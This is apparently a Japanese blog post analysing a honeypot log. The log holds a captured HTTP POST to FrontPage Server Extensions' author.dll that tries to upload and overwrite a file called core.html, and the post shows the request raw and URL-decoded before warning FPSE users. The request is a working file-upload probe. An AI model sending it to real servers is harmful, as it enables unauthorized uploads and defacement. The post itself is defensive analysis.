ハニーポットに珍しいログを発見したので、ご紹介します。

捕まえたログはこんなんです。

POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
Accept: auth/sicily
Cache-Control: no-cache
Connection: close
Content-Length: 194
Content-Type: application/x-vermeer-urlencoded
Host: XXX.XXX.XXX.XXX
Mime-Version: 1.0
User-Agent: core-project/1.0
X-Vermeer-Content-Type: application/x-vermeer-urlencoded

method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dcore%2ehtml%3bmeta%5finfo%3d%5b%5d%5d&put%5foption=overwrite&comment=&keep%5fchecked%5fout=false
core-project

なにやら"/vti_bin/vti_aut/author.dll"という見慣れないファイルへのアクセスですが、調べてみるとこれはMicrosoftのFrontPage Server Extensionsの設定ファイルでした。

FrontPage Server Extensionsって何？って思いましたが、CGIをIISで動作させるための拡張機能でした。

FrontPage Server Extensions は、Common Gateway Interface （CGI）、または、Internet Server Application Programming Interface (ISAPI) を使用します。Webの拡張機能を付けたいときに必要です。
FrontPage Server Extensionsって何？

POSTリクエストの部分をURLデコードするとこんな感じになります。

method=put document:4.0.2.4715&service_name=&document=[document_name=core.html;meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false
core-project

下記サイトに記載されているアプリケーション脆弱性診断で使用するPythonのスクリプト例とほぼリクエストが合致するので、攻撃者も同様のスクリプトを用いて探索しているものと思われます。 vulners.com

上記リクエストではcore.htmlというファイルをアップロードでテストしているようです。

この脆弱性を使用すると任意のファイルをアップロードできるので、FrontPage Server Extensionsを使用されている方は注意が必要です。